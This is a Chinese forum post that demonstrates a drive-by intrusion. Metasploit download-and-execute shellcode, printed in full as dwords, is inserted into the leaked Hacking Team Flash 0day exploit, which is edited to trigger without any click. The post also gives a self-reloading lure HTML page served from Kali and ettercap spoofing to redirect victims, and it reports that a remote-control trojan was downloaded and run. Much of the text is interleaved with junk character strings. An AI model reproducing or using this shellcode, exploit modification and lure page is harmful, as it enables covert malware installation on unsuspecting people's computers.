找回密码
 立即注册
查看: 1720|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 S" k+ i7 Q0 }5 a) T- J 三、flash 0day之手工代码修改制作下载者实例入侵演示 & Q( h8 ~ M! p

! V9 u' F& q* l4 x a5 u

# s2 c3 r' z" n) \ 利用到的工具: * F! \5 F1 x; e8 U* n

( l9 c9 M9 S. ?: F& X: T! m2 n; u

, |6 ~/ C8 i( V& g3 q8 M% v Msf . r! _/ \8 [9 w0 Q8 n* }* j

7 s! }( J( Q- r7 g) B

; M M' z0 W* u! d+ n$ K Ettercap ; c& [) d1 O/ v! O; c" M& o

0 `# K: V/ @- W" `

- S' a$ v2 U7 {' _% s$ R s# E Adobe Flash CS6 4 C+ u! u, m; R/ D( a3 W, T

- Z) X C# c0 j' R+ o8 I

/ t: t! o& W- T7 F$ n! c% r5 x f C8 u2 v Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 U; c& t, f" f+ P! j

" O4 U9 d; B$ P% z: }; {. P

+ E# G! u/ j* Z4 e$ Z2 x( X$ f0 r 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ( x7 L+ v& F0 }7 _

7 Y! }7 b* s& r8 r9 p

9 @0 ?7 Q1 I5 o$ _: w4 C1 V6 R 如图: ! Z2 V3 n" t# x+ m

$ Y+ m0 V$ M* {( |# f7 G& w

, W% Q" \& q# @2 n! B   ; C, W% Q! b2 ] o3 F* G+ W

2 J7 K# L5 M7 L/ N

( I" z2 E2 d1 Y5 E   . x) C5 X( T, e. F a5 ^6 Z

1 V5 P5 O- n% t7 r1 z: ^9 _6 Y5 r- Y

' ^8 ] w9 D5 [+ @9 U6 H4 n9 \4 P 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' i ?8 M9 I6 C

7 ~( p' D+ n2 @2 V, s$ [

. ~5 x3 P! h' w$ D k5 ]" T   ' k! J" B1 o' E

/ K1 X( ^( v" g' b, Y1 \

1 H# ~1 O) Y3 F* ~# z   `/ {8 A N) b r1 R

$ I+ J$ b$ J, C8 ^) w

* k; O. U- Y7 y4 b 然后执行generate -t dword生成shellcode,如下: * V3 B& C# @9 |! _

& _, N2 T& H! _2 u; D

% i7 N* }7 @4 p8 B1 z: y   % O5 U2 F5 W! H! n1 J8 `

+ \2 I8 A8 p6 L& X4 H" k7 i

) F9 y# w, O. e% i5 N 复制代码到文本下便于我们一会编辑flash exp,如下: 9 @, y: h) L( ~$ w0 p

x6 R- w1 N" ?

; }7 _; ]: B; C, e5 {/ x 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 j9 A5 w) b* B! T

1 K4 O `- w# S. f, a0 l7 }7 m

3 R3 \& V$ z8 O# `: z1 A. ? 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' _; f: V, ^- ^4 E1 {" y; t

) B( _( w9 [: V- h R* V9 f

9 _1 `' x [+ z g" U7 {7 |: H# c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! T6 O/ r7 H; [$ I+ e) R

+ H( H1 B1 ], m* h% y" g

) G( A5 H$ i F 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, / a' {% O# I: Z8 e: p& P1 F

% K" R2 f7 j% ?1 W

) | S7 K. R+ H' Q" O: R8 e 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, `. R) ]9 T% c o2 R. |. P+ L

6 l4 j( B, t2 ~

& ^# _0 I$ `4 \0 C3 K9 j. W8 c 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ; M8 E( c- `8 B6 \6 P9 [

/ {5 H/ S8 I; [ R

$ ?' u* c) ]6 p! Y 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, : i8 l" q. x! B6 y# E, d7 ]

0 K3 z) n$ X+ V q3 D# C8 i

# U2 I3 t5 d; z+ R* ]9 T5 w 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 c* C- g3 X" [; y

3 j. ^3 Z+ L- i$ ^* x7 w# J/ r

7 t) g/ R& }0 s. b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 P% J2 C/ ]0 c7 E- @ H

( u L: U( L: Z/ `1 @+ S

( d L/ a" f4 m: S4 l6 G2 S 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 6 \3 `, D3 L( p) h( Q5 K, ]

' t& \( h# h0 o) x) @2 s

3 f; W5 F: T7 K4 u1 |9 }4 c, | 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 \- ]9 h1 [8 F" q. p# }

/ P7 }2 G3 N1 v6 R& M% H

0 D5 y! {' s. {8 O G( ]; |5 X 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' d7 d0 b4 q" p9 a% N4 L# e: g

" T! C/ w5 p* `3 E

3 J/ g4 q& d# u; J) D7 q C8 { 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, d/ y7 l* M! D

- [+ ?! @6 t2 j: l3 I

$ F9 k' [; a( T1 s 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % T. M) p- J3 }6 n

+ G$ F; e% [$ U; a) C. f

( t- ?9 D( d6 ?8 |4 z& G   & v7 }) ~% M+ i+ F5 ]

" C0 K; e: p% }; u7 g2 s# a7 s5 I

- ?6 ~1 }6 J; ]# A1 T8 ]   7 P: z3 r# |; M5 i6 u* |

6 ^8 K8 D7 b# s

E+ G4 |. a+ g2 r0 Q3 m 下面我们来修改flash 0day exp,需要修改三个文件,分别为: + F3 c1 E+ ~; h5 |' F, `

( X9 x1 x% t# s

" E0 c0 o5 W+ A9 d! ~   5 V) a- n2 w8 s3 V

6 \# W3 I; g5 w0 v/ R- C! a R$ o

6 `8 h P& w4 Y' @- H# V 先修改ShellWin32.as,部分源代码如图: 0 Y1 D) g& p9 G$ E3 W7 S) w' a. F

3 v/ V/ p- u. N: j: o6 L, |

( b8 d# n1 i/ j. q* H. I P6 H   , n- ?* g7 g) f# o* y$ e5 @

" S1 @9 d$ t- ~3 N5 V

& G/ E6 j2 V9 W; R- Y 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 n1 P1 S" N8 ~7 q

; _% m) n6 a. Q

" s8 c4 |2 S# n8 Q   " A/ Q0 _2 j) G+ V

1 {- `! {" p# o9 y. s2 c* o3 D3 W

0 u" O% t1 J8 m- T l 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 F6 d: Y- N i p+ L. l

# c# ]: M8 M+ d- D- p2 S- d

- E8 n& [ m' N   & o( [5 ^8 a) B+ d" _

% |' u1 H: |' L$ k9 O+ }. @

2 I @1 _: e, n0 |. c0 c- {/ M1 r 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: z3 C; @( ^) `4 V

% ^$ Z$ a% ]1 Q; X1 b

" V9 g3 p/ L7 i   ; O5 `2 D$ k8 ]

u+ d; ]' }) j6 q

9 G) Y) h. y; {* C# G/ l* J   9 \8 l. z2 Q) x& V

: X4 z: E! s q

' {6 d t7 D: X4 E, q   $ o6 h8 j" F" y

# H: j( f$ P e" H

2 u/ A, O( N3 g4 |, R! |( D 然后点保存,下面我们来编译一下,打开 & N& J, }# a% c

3 C& W9 w" B( |7 G, d

) L! i7 d! ?9 v& Q' |8 q exp1.fla然后点文件-发布,看看编译没错误 ! p$ k+ ^/ w" \' \7 `2 o+ D

4 F! q g0 t( ~& E8 d. z2 o' d, t

4 h1 W) i" A3 j7 P2 R* h. O2 d   , V/ B1 @- V. x

3 t" p( \5 L+ L4 [# Q7 ]! @/ ?4 d

6 G9 f# k5 u, F2 X: ?/ ]. N   # l: h1 ~/ k, t/ P0 A) _' T

* u/ t, x( i* ?/ C8 |/ O

7 N' F! D. z: {5 z' G) ^   1 v4 I7 S, y9 F1 p; v

; C8 L: V" H: Z; J2 U/ `1 |6 y1 F

! i) @9 W; Z/ O4 r4 B& v4 v0 l# `   - N/ ~: Q: c% P3 }! x" C( |

" x* R' q; C! @3 {1 K' R+ `' J& n

& A1 L1 @0 s0 ^7 t- {' T; s8 s6 e0 i 然后我们把生成的 5 h0 {9 v+ |3 }" J8 J% W6 n& d. A( H3 r

' B% V" D3 w: y3 u/ c% `

6 {6 ]4 x# Q% C: W: P exp1.swf丢到kailinux /var/www/html下: 8 J7 r, S' X2 v0 l i6 \4 e! X

+ U) n; | w4 A/ f

! g! A. R0 X% ?$ L 然后把这段代码好好编辑一下 # @- C+ S7 K ~! m" m

' c! |" l1 u7 Q% L7 Z- a* x/ M

2 }% L1 g+ g( D0 f   2 \7 r! e- f% y' ~# G) |9 `) Z

+ [' t; O+ Q* A7 S9 ^9 |

2 F0 o$ e# _* [( [7 [4 H7 \   ) f5 l+ `) Z1 a% p5 V3 J; S3 J

3 ^+ ?: N" M7 s$ k0 x5 n

7 z% D; H& J( e& ~3 R% @) U8 X   - F4 ^& P9 p& [$ u

2 c8 P" }$ s$ m2 I, ?# o

: }; \7 t" s S" ~   # p$ R- a2 b7 A+ c9 `- ]& i4 a

$ N- m' y: d7 S

8 h( B1 I- d1 {# q" P   , }0 k& e2 v9 i1 b5 m# A4 h$ c8 z

' U3 z: l1 [% W& W: F$ Z

- n- u; o: M& J2 K- n7 M; n/ Y   + ?( P- h$ @: ]- M" q6 T6 [, \( h4 P1 Y

+ A; ^1 S$ E# _: v

; `6 X) Y- C7 i <!DOCTYPE html> 8 s6 e( l2 L) s1 y g" _0 z

9 \* `. ]/ ~. {- C' {5 b/ j. V7 a

- ?7 Z% ~" n- @: t. b) N <html> - K7 |; y% B* D- r7 T+ O

; x& @4 s' d$ J" J3 H3 u2 I; C, Y

8 z/ o2 l, C% z2 F/ ~% p. M <head> * [) t) x8 g& H, W; D7 _5 P! R. s

8 g; A2 _, z/ A b5 N s' d

/ ~2 Q$ c1 a3 ?+ R: O T& } <meta http-equiv="Content-Type" content="text/html; : y) o+ ^! }# u: k

: i& ]8 }# G2 B: S" _( C* E/ F

0 I, u0 h' O4 F9 M- M" C4 I charset=utf-8"/> - i, Q: p7 i9 `5 S0 I

2 _% S9 V9 M' {- {

( w2 w) y+ Z2 j! N7 B# Z( t8 v4 \ </head> $ V4 {; p2 T/ `9 |4 [

5 z; K8 T, U# w) o6 ]2 a4 T/ E

0 c" l; X8 r3 B$ J! i7 V0 V& F <body> 7 h# i, T3 |9 m4 E- H8 W

2 O+ f; ~! f1 s6 w8 H

J8 H: y# w4 c/ v6 W <h2> Please wait, the requested page is loading...</h2> ; n, ^' a- b: B1 D: U5 G

7 ?% n6 ?+ k3 u/ X

$ j+ E ?7 S q! ~- I f0 o2 q S <br> 6 }: D/ A% F$ m* C: j, b

: z) n$ U9 N* L$ k0 x

; H T% s1 a2 Q6 S$ q0 N0 `- X2 N <OBJECT - M, i e' |7 j1 t: Y ~# W7 p

9 W: s" N. R) Q6 O3 g1 T

. g) I9 x% O. @ e# u+ c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie - S' n% V4 V) ~) A/ L

2 P4 U: x- d3 e2 ^* z4 I M( D

( p: d$ A- B' w8 a% c VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ; ~# m3 P7 n* u& U/ y$ \, ?

, y2 U! ^1 [# M+ y; v) d

* I5 f8 |# W2 u! u! v </body> : \; F9 @0 f- p! F+ B# d" ?

; i6 m8 H" T8 X3 b. @: X

( {) \4 f. w. Q ~2 u <script> ; i' K% K8 i5 `+ [

# s6 A, I) V, C9 Q; ]# _/ m' j

0 `4 M3 W1 h: A4 D( ]& G     setTimeout(function () { 5 ?2 c3 l3 o1 L- L2 X

, L8 k8 ]3 V0 H$ K) ]

. G. k. F" w0 J1 S- S- z* S( Y          3 m; U% `; K+ ~* c6 }

: I' I4 x) m0 {# z& i7 v

! n( u3 A- d1 J. x) L( q! I3 b6 a window.location.reload(); + ^8 a, S* O) D) T

9 ]* M- J3 o. B2 M9 O

& ?3 }9 {0 F2 ]9 T3 L* [1 I8 f     }, 10000); # w c, Q6 h- b9 k3 |8 w

4 c+ V6 ]" b& x; y& y

+ F5 s# o9 |" {1 Q' C8 C' t   - M3 p1 h' U. o) ^

* O [) m2 c. j" [

4 T# ^ w. `- r6 q: n& Z3 U2 Z4 n </script> 6 q% ]7 f4 l7 z& D

6 g! g% K. r9 S0 N

$ p% A" c! D8 T! M- X3 g: _; _) O </html> 1 ~3 y7 ?0 g- T; _ e! ?0 u

* |) E6 e C8 j5 c( G) H& d1 N. I

m! m ^5 u, I5 v4 B+ j   9 q3 Y8 H. j0 _8 t2 v% e }

3 l6 `- G1 ~" b( c! Z8 U* ~

+ Y$ r l3 w, v3 T 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 8 D9 v0 U. G9 G( L9 b

4 X( w& e4 E) [+ e4 s4 |) p7 _

8 [; q: j5 p) B   / L) J2 S( y+ d: d" v6 g4 w

/ O: C1 G/ y5 C- y* ^7 M! F

# F' D& v" d# Q3 A5 U G& O   7 l5 p$ a* ^6 |

$ K0 h5 D$ R0 `$ J

" v/ s% H0 q x0 _+ ]( Z   9 W* }4 n% u: ?9 h

9 V" |' o, z. V' {" k0 b8 ~6 v

) ?) S( i+ c9 ^6 q   2 t6 d+ _" i0 }. T

! L8 l2 k. ~( R+ Y1 S S0 q0 b) Q

# t- `- a* \: m8 D( P   3 a" ~, V5 W3 W9 K

$ d4 E/ |/ u! k

' R1 W8 o0 R0 D& j0 M3 F3 H" p 下面我们用ettercap欺骗如图: 1 }3 q1 Q F1 d. k8 @# {. D0 G

2 `2 Y& x" H: b9 s

: E H6 `2 K+ Z   ! \- r: w8 @, |; V+ z! l

! e* Q4 T* \$ g6 o+ ?

, h" W3 ~2 b: U6 j2 b; ?7 d   4 D: S9 G6 |+ r* Q

0 |% V" }4 z, w7 U! _

0 P. J/ D. H: w2 O2 T) K 下面我们随便访问个网站看看: ! w4 ], ]6 Z# E; H" y

: d$ T( Q d/ [2 u) F m

# J7 p0 D7 q! x3 {1 u. z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: + m% r$ n/ M! U5 @$ X; i) S2 R t

, U4 g$ [, D! \. P& K

- o3 A: ~1 w# v* p& @! ^   0 a) O( I% C. ~5 M% I

, e1 c* N' s* Z4 F. w0 R

- H" v% p$ G) }, k 我们看另一台, 3 S4 g4 {: W9 d2 N# j6 d$ q0 Z

- S9 J5 U! Y4 Z* |" |& ~: Z

) D6 }9 r% I* u# A/ E ?5 J 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 9 G, o5 a9 ~" N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表